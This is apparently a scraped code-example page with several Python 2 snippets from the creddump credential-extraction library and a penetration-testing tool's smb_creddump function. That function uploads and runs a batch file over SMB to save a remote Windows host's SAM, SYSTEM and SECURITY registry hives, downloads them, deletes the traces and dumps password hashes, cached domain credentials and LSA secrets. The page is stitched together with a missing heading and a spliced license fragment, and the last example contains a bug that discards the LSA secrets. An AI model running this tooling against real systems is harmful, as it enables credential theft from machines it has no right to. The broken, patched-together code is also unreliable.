Пример #1
0
#
# creddump is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# creddump is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with creddump.  If not, see <http://www.gnu.org/licenses/>.

"""
@author:       Brendan Dolan-Gavitt
@license:      GNU General Public License 2.0 or later
@contact:      [email protected]
"""


import sys
from framework.win32.domcachedump import dump_file_hashes

if len(sys.argv) < 3:
    print "usage: %s bootkey <security hive>" % sys.argv[0]
    sys.exit(1)

dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2])

Пример #2
0
def smb_creddump():
	"""
	[-s] <ip> [ user ] [ passwd/nthash ]
	Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets
	"""

	try:
		sys.path.insert(0, BASEDIR + '/creddump')
		from framework.win32 import hashdump, domcachedump, lsasecrets
	except:
		text("[!] Error: Creddump dependency missing.", 1)

	set_creds(3)

	text("[*] Extracting hives...")

	tmpfile = '/tmp/cred_run.bat'

	bat = ['@echo off', 'cd \\windows\\temp', 
		'reg save HKLM\\SAM sam.hive /y',
		'reg save HKLM\\SYSTEM system.hive /y',
		'reg save HKLM\\SECURITY security.hive /y']

	open(tmpfile, 'w').write('\r\n'.join(bat))

	smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile)
	print winexe('\\windows\\temp\\cred_run.bat')

	text("[*] Downloading hives...")
	smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip'])
	smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' % CONF['smb_ip'])
	smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' % CONF['smb_ip'])

	text("[*] Removing temp files...")
	smbclient('del "\\windows\\temp\\cred_run.bat"')
	smbclient('del "\\windows\\temp\\sam.hive"')
	smbclient('del "\\windows\\temp\\system.hive"')
	smbclient('del "\\windows\\temp\\security.hive"')
	os.unlink(tmpfile)

	text("[*] Extracting SAM credentials...")
	hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_sam.hive')

	text("[*] Extracting MSCASH credentials...")
	domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')

	# Code below ripped from creddump's lsadump.py
	text("[*] Extracting LSA Secrets...")
	try:
		FILTER = ''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
		secrets = lsasecrets.get_file_secrets(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')

		if not secrets:
			text("[!] Unable to read LSA secrets.")

		else:
			for k in secrets:
				N = 0
				length = 16
				result = ''
				while secrets[k]:
					s, secrets[k] = secrets[k][:length],secrets[k][length:]
					hexa = ' '.join(["%02X" % ord(x) for x in s])
					s = s.translate(FILTER)
					result += "%04X   %-*s   %s\n" % (N, length*3, hexa, s)
					N += length
				
				print k
				print result
	except:
		pass

	text("[*] SYSTEM, SAM and SECURITY hives were saved in the current directory.")
# You should have received a copy of the GNU General Public License
# along with creddump.  If not, see <http://www.gnu.org/licenses/>.

"""
@author:       Brendan Dolan-Gavitt
@license:      GNU General Public License 2.0 or later
@contact:      [email protected]
"""


import sys
from framework.win32.domcachedump import dump_file_hashes
def showUsage():
    print "usage: %s <system hive> <security hive> <Vista/7>" % sys.argv[0]
    print "\nExample (Windows Vista/7):"
    print "%s /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true" % sys.argv[0]
    print "\nExample (Windows XP):"
    print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[0]

if len(sys.argv) < 4:
    showUsage()
    sys.exit(1)

if sys.argv[3] not in ["true", "false"]:
    showUsage()
    sys.exit(1)

vista = True if sys.argv[3] == "true" else False

dump_file_hashes(sys.argv[1], sys.argv[2], sys.argv[3])
Пример #4
0
def smb_creddump():
    """
	[-s] <ip/file/range> [ user ] [ passwd/nthash ]
	Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets
	"""

    try:
        sys.path.insert(0, BASEDIR + '/creddump')
        from framework.win32 import hashdump, domcachedump, lsasecrets
    except:
        text("[!] Error: Creddump dependency missing.", 1)

    set_creds(3)

    text("[*] %s Extracting hives..." % (CONF["smb_ip"]))

    tmpfile = '/tmp/cred_run.%s.bat' % (CONF["smb_ip"])

    bat = [
        '@echo off', 'cd \\windows\\temp', 'reg save HKLM\\SAM sam.hive /y',
        'reg save HKLM\\SYSTEM system.hive /y',
        'reg save HKLM\\SECURITY security.hive /y'
    ]

    open(tmpfile, 'w').write('\r\n'.join(bat))

    smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile)
    text("[*] %s Running cred_run.bat\n%s\n" %
         (CONF["smb_ip"], winexe('\\windows\\temp\\cred_run.bat')))

    text("[*] %s Downloading hives..." % (CONF["smb_ip"]))
    smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip'])
    smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' %
              CONF['smb_ip'])
    smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' %
              CONF['smb_ip'])

    text("[*] %s Removing temp files..." % (CONF["smb_ip"]))
    smbclient('del "\\windows\\temp\\cred_run.bat"')
    smbclient('del "\\windows\\temp\\sam.hive"')
    smbclient('del "\\windows\\temp\\system.hive"')
    smbclient('del "\\windows\\temp\\security.hive"')
    os.unlink(tmpfile)

    text("[*] %s Extracting SAM credentials..." % (CONF["smb_ip"]))
    hashes = hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive',
                                       CONF['smb_ip'] + '_sam.hive')

    text("[*] %s Extracting MSCASH credentials..." % (CONF["smb_ip"]))
    mscash = domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive',
                                           CONF['smb_ip'] + '_security.hive')

    text("[*] %s SAM hashes\n%s" % (CONF["smb_ip"], "\n".join(hashes)))
    text("[*] %s MsCash\n%s" % (CONF["smb_ip"], "\n".join(mscash)))

    # Code below ripped from creddump's lsadump.py
    text("[*] %s Extracting LSA Secrets..." % (CONF["smb_ip"]))
    try:
        FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.'
                          for x in range(256)])
        secrets = lsasecrets.get_file_secrets(
            CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')

        if not secrets:
            text("[!] %s Error(smb_creddump): Unable to read LSA secrets." %
                 (CONF["smb_ip"]))

        else:

            secrets = []

            for k in secrets:
                N = 0
                length = 16
                result = ''
                while secrets[k]:
                    s, secrets[k] = secrets[k][:length], secrets[k][length:]
                    hexa = ' '.join(["%02X" % ord(x) for x in s])
                    s = s.translate(FILTER)
                    result += "%04X   %-*s   %s\n" % (N, length * 3, hexa, s)
                    N += length

                secrets.append(k)
                secrets.append(result)

            text("[*] %s LSA Secrets\n%s" %
                 (CONF["smb_ip"], "\n".join(secrets)))
    except:
        pass

    text(
        "[*] %s SYSTEM, SAM and SECURITY hives were saved in the current directory."
        % (CONF["smb_ip"]))